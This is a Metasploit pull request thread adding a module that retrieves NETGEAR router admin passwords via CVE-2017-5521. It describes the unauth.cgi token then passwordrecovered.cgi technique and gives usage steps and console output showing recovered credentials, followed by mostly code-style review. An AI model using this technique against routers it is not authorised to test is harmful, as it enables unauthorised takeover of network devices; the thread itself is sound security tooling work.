Add NETGEAR admin password disclosure module
rapid7/metasploit-framework pull request #7916
Opened 2017-02-05 18:52 UTC by thecarterb

This module gathers the password for the admin user of many NETGEAR routers. In order to get the password, a generated token from `unauth.cgi` is passed to `passwordrecovered.cgi`, which gives the username and password. The module also gets the model of the router and tells it to the user by parsing the `WWW-Authenticate` header that almost every NETGEAR router has. A full list of affected models are listed here: http://pastebin.com/dB4bTgxz

## Verification

- [ ] Start `msfconsole`
- [ ] `use auxiliary/gather/netgear_password_disclosure`
- [ ] `set RHOST routerip`
- [ ] `set VERBOSE true` (if you want)
- [ ] `run`

## Example console output

```
msf > use auxiliary/gather/netgear_password_disclosure 
msf auxiliary(netgear_password_disclosure) > options

Module options (auxiliary/gather/netgear_password_disclosure):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The router target ip address
   RPORT    80               yes       The port to connect to RHOST with (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

msf auxiliary(netgear_password_disclosure) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf auxiliary(netgear_password_disclosure) > run

[*] Checking if 192.168.1.1 is a NETGEAR router
[+] Router is a NETGEAR router (NETGEAR R7000)
[*] Token found: 1567454696
[+] Creds found: admin/password
[*] Auxiliary module execution completed
msf auxiliary(netgear_password_disclosure) > 
```

#### References
https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911
http://thehackernews.com/2017/01/Netgear-router-password-hacking.html
https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/
https://www.exploit-db.com/exploits/41205

2017-02-05 22:24 UTC, zeroSteiner requested changes

2017-02-05 22:24 UTC, zeroSteiner commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +# -*- coding: binary -*-
This line is not part of the standard module header and should be removed.

2017-02-05 22:24 UTC, zeroSteiner commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +        This module will collect the the password for the `admin` user.
This sentence "...collect the the password..." should have a single "the" in it.

2017-02-05 22:24 UTC, zeroSteiner commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +    return text[/#{start_trig}(.*?)#{end_trig}/m, 1]
The `return` here is not necessary per the [ruby style guide](https://github.com/bbatsov/ruby-style-guide#no-explicit-return).

2017-02-05 22:24 UTC, zeroSteiner commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +      if token == nil
This check should be `if token.nil?`.

2017-02-05 22:24 UTC, zeroSteiner commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +      if r.to_s.include?('left">') != nil
It's actually not necessary to compare the result here to `nil`.

2017-02-05 22:24 UTC, zeroSteiner commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +      fail_with(Failure::Unknown, 'Connection timed out.')
`Failure::Unreachable` would probably be more suitable here since the request failed.

2017-02-06 14:51 UTC, thecarterb commented
@zeroSteiner Done :)

2017-02-06 15:50 UTC, zeroSteiner commented
It looks like some of the comments I thought I had made were not saved in the review but I also meant to point out the usage of `send_request_raw` throughout the module. This isn't typically considered best practice.

A few things to note about this is:
* It's important to always check that res is non-nil before converting to a string and generally proceeding under the assumption that the request succeeded
* Per the [wiki page on making HTTP requests](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient) it's generally preferred to use `send_request_cgi` instead of it's raw equivalent.
  * This will also allow you to use things like `vars_get` and `vars_post` instead of creating the data manually yourself.
* You'll also want to add a `TARGETURI` option so you can do the patch concatenation properly using the `normalize_url` function. See the [URI Parsing](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient#uri-parsing) section of the same page.

Additionally when I tested this module yesterday against a patched router, it ending up saying it found the creds but they were blank (`[+] Creds found: /`). If the patch level of the router is not available it would be fine to check if the credentials are blank after the regex and print an error message.

2017-02-06 21:39 UTC, wvu-r7 commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +      if data.include? "WWW-Authenticate"
You should check `res.headers['WWW-Authenticate']`.

2017-02-06 21:40 UTC, wvu-r7 commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +      OptPort::new('RPORT', [true, 'The port to connect to RHOST with', 80]),
`RHOST` and `RPORT` are already set.

2017-02-06 21:40 UTC, wvu-r7 commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +    rhost = datastore['RHOST']
There's already an `rhost` method that does this.

2017-02-06 21:41 UTC, wvu-r7 commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +        http://pastebin.com/dB4bTgxz
Consider moving this to a `URL` reference if it's not included in any existing reference material.

2017-02-06 21:42 UTC, wvu-r7 commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +        products. The full list of affected productsis available here:
s/productsis/product is/

2017-02-06 21:42 UTC, wvu-r7 commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +        products. The full list of affected productsis available here:
s/productsis/products is/

2017-02-06 21:43 UTC, wvu-r7 commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +        'vars_get' => "id=#{token}"})
```
vars_get => {'id' => token}
```

2017-02-06 21:44 UTC, wvu-r7 commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +      print_erro("#{rhost} returned an empty response")
s/print_erro/print_error/

2017-02-06 21:46 UTC, wvu-r7 commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +        username = scrape(r.to_s, "<td class=\"MNUText\" align=\"right\">Router Admin Username</td><td class=\"MNUText\" align=\"left\">", "</td>")
Consider using a parser.

http://stackoverflow.com/a/1732454

2017-02-06 21:50 UTC, wvu-r7 commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +    unless res
`if res.nil?` if you want to be consistent.

2017-02-06 22:08 UTC, thecarterb commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +      fail_with(Failure::Unknown, 'Connection timed out.')
When the connection times out, I get a `Rex::ConnectionTimeout` error, should I fail with that instead?

2017-02-07 15:48 UTC, thecarterb commented
@zeroSteiner @wvu-r7 I've tested the edited module against a vulnerable router and it seems to work fine. Any other changes you guys want?

2017-02-08 01:53 UTC, zeroSteiner requested changes
I went ahead and tested this module again and got a stack trace. I believe I tracked the issue down to line 95 and I noted it in the feedback with a few other stylistic things.

2017-02-08 01:53 UTC, zeroSteiner commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +  #This checks the response dor that header.
"This checks the response **for** that header." There should also be a single space after the `#` starting the comment.

2017-02-08 01:53 UTC, zeroSteiner commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +        if username == "" || password == ""
This starts a small block of code that does not match the indententation level of the lines before it.

2017-02-08 01:53 UTC, zeroSteiner commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +      username = username.strip!
I'm pretty sure this is causing me to get a stack trace when I run this against my test unit which is not vulnerable.

```
msf (S:0 J:0) auxiliary(netgear_password_disclosure) > run

[*] [2017.02.07-20:39:29] Checking if 192.168.254.1 is a NETGEAR router
[*] [2017.02.07-20:39:29] Sending request to http://192.168.40.1/
[+] [2017.02.07-20:39:29] Router is a NETGEAR router (NETGEAR R7000)
[*] [2017.02.07-20:39:29] Token found: 547112587
[*] [2017.02.07-20:39:29] Token found at 192.168.40.1/unauth.cgi?id=547112587
[*] [2017.02.07-20:39:29] Sending request to 192.168.40.1/passwordrecovered.cgi?id=547112587
[-] [2017.02.07-20:39:29] Auxiliary failed: NoMethodError undefined method `strip!' for nil:NilClass
[-] [2017.02.07-20:39:29] Call stack:
[-] [2017.02.07-20:39:29]   /home/steiner/repos/msf/modules/auxiliary/gather/netgear_password_disclosure.rb:95:in `run'
```

2017-02-08 01:53 UTC, zeroSteiner commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +        })
This should be aligned with the `r` (one less tab).

2017-02-08 01:53 UTC, zeroSteiner commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +      return
This return isn't necessary here. You could also invert the logic of the conditional statement it's the `else` clause to and then dedent the majority of the function's body.

2017-02-08 01:53 UTC, zeroSteiner commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +    else
The `else` block here isn't necessary because you're returning in the block above it. Additionally the block above should be returning `Exploit::CheckCode::Safe` since the response was not what was expected.

2017-02-08 01:53 UTC, zeroSteiner commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +      vprint_status("Token found at #{rhost}/unauth.cgi?id=#{token}")
Personally I think this is a little redundant since I always run with VERBOSE set to True. If the path is relevant information then maybe just make this a normal `print_status` and drop the preceding line.

2017-02-08 02:01 UTC, thecarterb commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +      username = username.strip!
My guess is that `scrape` isn't returning a result, therefore `username` and `password` are `nil`

I suppose I'll check if username and/or password are `nil`;

```ruby
if username.nil? || password.nil?
  return Exploit::CheckCode::Safe
else
  username.strip!
  password.strip!
end
```

I'll test that in a bit, but if that doesn't work I'll find something else

2017-02-08 02:16 UTC, thecarterb commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +      vprint_status("Token found at #{rhost}/unauth.cgi?id=#{token}")
It's not really relevant. I put it there so people who were curious about the steps taken to get the creds could see them

2017-02-08 07:32 UTC, wvu-r7 commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +        if username == "" || password == ""
Consider using `empty?` instead. Caveat: you have to check for `nil`.

2017-02-08 07:45 UTC, wvu-r7 commented
@thecarterb: I think @zeroSteiner's got a good handle on this. I apologize for dropping the ball on #7717. You seem very receptive to review...

2017-02-08 08:00 UTC, wvu-r7 commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +      raw_html = html.text
When I suggested the use of a parser, I was also suggesting you do something like XPath with it. It seems you're regexing the parsed text now. This is better, but a parser can do much more.

2017-02-08 17:57 UTC, zeroSteiner commented on modules/auxiliary/gather/netgear_password_disclosure.rb
> +        return Exploit::CheckCode::Safe
`Exploit::CheckCode`s should only be returned from check methods. You're right in that here it doesn't make sense to continue execution but you should print an error message that the device isn't vulnerable and simply return.

Also once you update this block, the `else` clause below isn't necessary you can just dedent the `username = username.strip!` and `password = password.strip!`. Additionally in ruby the `.strip!` method updates the variable in place so `password.strip!` is functionally equivalent to `password = password.strip!`.

2017-02-08 17:59 UTC, zeroSteiner commented
@thecarterb I added a single comment based on the latest round of changes and was able to successfully test the module.

```
msf > use auxiliary/gather/netgear_password_disclosure 
msf auxiliary(netgear_password_disclosure) > set rhost 192.168.1.2
rhost => 192.168.1.2
msf auxiliary(netgear_password_disclosure) > show options 

Module options (auxiliary/gather/netgear_password_disclosure):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST      192.168.1.2      yes       The target address
   RPORT      80               yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the vulnerable application
   VHOST                       no        HTTP server virtual host

msf auxiliary(netgear_password_disclosure) > run

[*] Checking if 192.168.1.2 is a NETGEAR router
[+] Router is a NETGEAR router (NETGEAR R6300)
[*] Token found: 1627616450
[+] Creds found: admin/Password123
[*] Auxiliary module execution completed
msf auxiliary(netgear_password_disclosure) > 
```

2017-02-08 18:04 UTC, thecarterb commented
@zeroSteiner when you tested it, did you put in the changes you suggested or did you test the module as it is right now?

2017-02-08 18:07 UTC, zeroSteiner commented
Tested the module as of the latest commit at the time.

2017-02-08 18:16 UTC, thecarterb commented
okay, I'll implement the comment in a few

2017-02-08 18:47 UTC, thecarterb commented
@zeroSteiner I've implemented it and it passed all travis tests, but I can't test it right now, do you mind testing it and see if everything's good?

2017-02-08 20:46 UTC, zeroSteiner approved these changes

2017-02-08 20:51 UTC, zeroSteiner commented
Thanks @thecarterb! The module is still working correctly after those last changes and I'm comfortable merging it in. Thanks for your contribution. Will be landed in a minute.

2017-02-08 20:52 UTC, merged

2017-02-08 20:55 UTC, zeroSteiner commented
# Release Notes

Multiple Netgear routers are affected by a vulnerability which can be leveraged by an unauthenticated attacker to disclose the password for the administrative interface. This vulnerability is identified by CVE-2017-5521.

2017-02-09 21:36 UTC, wvu-r7 commented
Thanks for the effort here, folks!

2017-02-22 00:17 UTC, tdoan-r7 commented
The netgear_password_disclosure module has been added. You can run this module to gather the password for the admin user of many NETGEAR routers. To see a full list of affected models, go to http://pastebin.com/dB4bTgxz.